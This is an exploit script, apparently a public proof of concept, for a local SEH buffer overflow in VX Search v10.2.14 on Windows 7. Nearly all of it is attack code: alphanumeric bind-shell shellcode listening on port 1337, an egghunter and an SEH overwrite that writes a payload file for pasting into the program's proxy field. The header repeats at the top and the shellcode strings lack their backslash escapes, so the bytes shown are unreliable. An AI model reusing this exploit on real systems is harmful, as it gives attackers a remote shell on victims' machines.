#!/usr/bin/env python
#
# Exploit Title : VXSearch v10.2.14 Local SEH Overflow
# Date : 11/16/2017
# Exploit Author : wetw0rk
# Vendor Homepage : http:// #!/usr/bin/env python
#
# Exploit Title : VXSearch v10.2.14 Local SEH Overflow
# Date : 11/16/2017
# Exploit Author : wetw0rk
# Vendor Homepage : http://www.flexense.com/
# Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Version : 10.2.14
# Tested on : Windows 7 (x86)
# Description : VX Search v10.2.14 suffers from a local buffer overflow. The
# following exploit will generate a bind shell on port 1337. I
# was unable to get a shell working with msfvenom shellcode so
# below is a custom alphanumeric bind shell. Greetz rezkon ;)
#
# trigger the vulnerability by :
# Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name
#

import struct

shellcode = "w00tw00t"
shellcode += (
"x25x4ax4dx4ex55" # and eax, 0x554e4d4a
"x25x35x32x31x2a" # and eax, 0x2a313235
"x2dx6ax35x35x35" # sub eax, 0x3535356a
"x2dx65x6ax6ax65" # sub eax, 0x656a6a65
"x2dx61x64x4dx65" # sub eax, 0x654d6461
"x50" # push eax
"x5c" # pop esp
)
shellcode += (
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx4fx4fx4fx4f"
"x2dx4fx30x4fx68x2dx62x2dx62x72x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx76x57x57x63x2dx77x36x39"
"x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x54"
"x54x54x2dx25x54x7ax2dx2dx25x52x76x36x50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx49x35x49x49x2dx49"
"x25x49x69x2dx64x25x72x6cx50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx70x33x33x25x2dx70x25x70x25x2d"
"x4bx6ax56x39x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx79x55x75x32x2dx79x75x75x55x2dx79x77x77x78"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx25x4ax4a"
"x25x2dx39x5fx4dx34x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx4bx57x4bx57x2dx70x76x4bx79x2dx70x76"
"x78x79x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49"
"x49x49x49x2dx49x4ex64x49x2dx78x25x78x25x2dx6f"
"x25x7ax48x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x58x58x38x58x2dx58x30x32x58x2dx51x46x2dx47x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx5fx52x5fx5f"
"x2dx5fx25x25x35x2dx62x39x25x25x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx4ax4ax4ax4ax2dx4ax4ax4a"
"x4ax2dx79x39x4ax79x2dx6dx32x4bx68x50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx30x30x71x30x2dx30x25"
"x71x30x2dx38x31x51x5fx50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx32x32x32x32x2dx78x77x7ax77x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx62x62x62x62x2d"
"x48x57x47x4fx50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx76x76x4fx4fx2dx36x39x5ax5ax50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx61x61x61x61x2dx4ax61x4a"
"x25x2dx45x77x53x35x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx63x63x63x63x2dx39x63x63x2dx2dx32x63"
"x7ax25x2dx31x49x7ax25x50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx72x79x79x79x2dx25x30x25x30x2dx25"
"x32x25x55x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x58x58x41x58x2dx58x58x25x77x2dx6ex51x32x69x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx48x77x38x48"
"x2dx4ex76x6ex61x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx41x41x6ex6ex2dx31x31x30x6ex2dx37x36x30"
"x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx38x38"
"x38x38x2dx38x79x38x25x2dx38x79x38x25x2dx58x4c"
"x73x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx61"
"x52x61x52x2dx37x4ax31x49x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx4dx47x4dx4dx2dx30x25x4dx6bx2d"
"x36x32x66x71x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx36x43x43x6cx2dx33x54x47x25x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx4cx4cx4cx4cx2dx6ex4cx6e"
"x36x2dx65x67x6fx25x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx25x25x4bx4bx2dx25x25x6fx4bx2dx4ex41"
"x59x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41"
"x41x41x41x2dx52x52x78x41x2dx6ex6cx70x25x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx30x6cx30x30x2d"
"x30x6cx6cx30x2dx38x70x79x66x50x25x4ax4dx4ex55"
"x25x35x32x31x2ax2dx42x70x70x45x2dx32x45x70x31"
"x2dx25x4bx49x31x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx25x50x50x50x2dx25x7ax72x25x2dx4ex73x61"
"x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x77"
"x74x74x2dx61x78x35x34x50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx30x30x30x30x2dx30x30x59x30x2dx30"
"x30x74x51x2dx6bx36x79x67x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx75x38x43x43x2dx7ax31x43x43x2d"
"x7ax2dx77x79x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx59x59x59x59x2dx59x59x59x59x2dx6fx6cx4dx77"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx45x45x45"
"x45x2dx34x2dx76x45x2dx37x25x5ax65x50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx34x34x34x34x2dx62x34"
"x34x34x2dx6dx56x47x57x50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx2dx2dx2dx2dx2dx76x2dx2dx76x2dx55"
"x4cx55x7ax50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x77x77x77x30x2dx47x47x79x30x2dx42x42x39x34x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx56x75x36x51"
"x2dx42x61x49x43x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx56x56x31x56x2dx31x79x31x25x2dx50x6cx48"
"x34x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx72x72"
"x72x72x2dx72x25x38x38x2dx38x25x25x25x2dx54x41"
"x30x30x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx47"
"x47x47x76x2dx47x47x76x76x2dx6bx72x6cx5ax50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx25x71x25x71x2d"
"x73x42x63x68x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx48x55x51x51x2dx45x78x4fx5ax50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx45x45x45x32x2dx45x45x25"
"x31x2dx76x75x2dx25x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx6ex4fx6dx6ex2dx35x48x5fx5fx50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx2dx2dx2dx2dx2dx71"
"x2dx2dx71x2dx71x2dx4ax71x2dx66x65x70x62x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx56x30x56x30x2d"
"x56x38x25x30x2dx74x37x25x45x50x25x4ax4dx4ex55"
"x25x35x32x31x2ax2dx32x32x32x77x2dx32x32x32x32"
"x2dx43x41x4ax57x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx63x63x63x30x2dx79x41x41x6ex50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx4bx4bx4bx4bx2dx4bx4b"
"x25x31x2dx4bx71x25x32x2dx4fx6ex25x2dx50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx37x37x37x37x2dx6d"
"x37x6dx37x2dx6dx37x6dx37x2dx64x55x63x58x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx44x6cx6cx6cx2d"
"x34x44x44x6cx2dx30x33x4ex54x50x25x4ax4dx4ex55"
"x25x35x32x31x2ax2dx2dx7ax43x2dx2dx48x79x71x47"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41"
"x41x2dx41x46x71x25x2dx5ax77x7ax32x50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx47x47x47x47x2dx47x6e"
"x47x6ex2dx47x78x6ex78x2dx47x79x77x79x50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx74x38x69x38x2dx51"
"x4ax72x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x79x79x30x79x2dx4dx4dx2dx4dx2dx44x35x25x41x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx6fx6fx6fx31"
"x2dx74x25x6fx33x2dx56x32x41x25x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx54x54x54x54x2dx72x72x54"
"x54x2dx79x69x49x56x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx70x70x70x70x2dx70x25x5ax70x2dx4ax38"
"x36x72x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx6d"
"x6dx6dx6dx2dx6dx6dx6dx46x2dx48x76x74x25x2dx53"
"x7ax25x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x7ax7ax7ax43x2dx49x43x25x43x2dx25x5fx25x30x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx51x51x51x51"
"x2dx51x51x51x70x2dx38x51x61x7ax2dx25x39x70x7a"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx37x44x37"
"x6cx2dx78x30x6fx73x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx44x25x25x44x2dx76x25x76x76x2dx63x6c"
"x63x74x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx42"
"x47x74x4ex2dx33x6cx7ax39x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx7ax30x66x7ax2dx76x44x4fx49x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41x41"
"x2dx6dx67x33x6cx50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx51x51x51x51x2dx65x71x51x51x2dx49x76x7a"
"x6ax50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x4a"
"x42x35x2dx35x7ax7ax42x2dx76x7ax73x7ax50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx35x25x35x35x2dx35"
"x25x76x35x2dx35x39x52x69x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx74x74x74x5ax2dx36x5ax74x30x2d"
"x25x32x6ax38x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx75x75x43x75x2dx43x6fx41x30x2dx39x64x30x34"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx74x2dx58"
"x6ex2dx78x47x35x69x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx66x79x4fx66x2dx48x7ax25x47x50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx42x42x7ax42x2dx33"
"x6dx55x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x61x61x61x41x2dx61x39x64x25x2dx59x33x7ax34x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx66x66x66x66"
"x2dx41x41x66x66x2dx25x33x66x66x2dx34x25x6dx43"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49x49x32"
"x49x2dx49x59x25x49x2dx72x74x25x6dx50"
)
shellcode += "A" * 4000

egghunter = "A" * 40 # serve as NOP's
egghunter += (
"x25x4ax4dx4ex55" # and eax, 0x554e4d4a
"x25x35x32x31x2a" # and eax, 0x2a313235
"x2dx58x58x58x58" # sub eax, 0x58585858
"x2dx58x58x67x58" # sub eax, 0x58675858
"x2dx5ax4fx2dx4f" # sub eax, 0x4f2d4f5a
"x50" # push eax
"x5c" # pop esp
)
egghunter += (
"%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-"
"r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%"
"JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6"
"W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5"
"21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP"
)

offset = "A" * (23920-len(shellcode)) # offset to nSEH
nSEH = "x74x26x75x26" # JE/JNZ + 38 (decimal)
SEH = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint])
trigger = "A" * (40000 - (
len(offset) +
len(nSEH) +
len(SEH) +
len(egghunter) +
len(shellcode)
)
)

payload = offset + shellcode + nSEH + SEH + egghunter + trigger
print "[*] payload written to pasteme.txt"
fd = open("pasteme.txt", 'w')
fd.write(payload)
fd.close()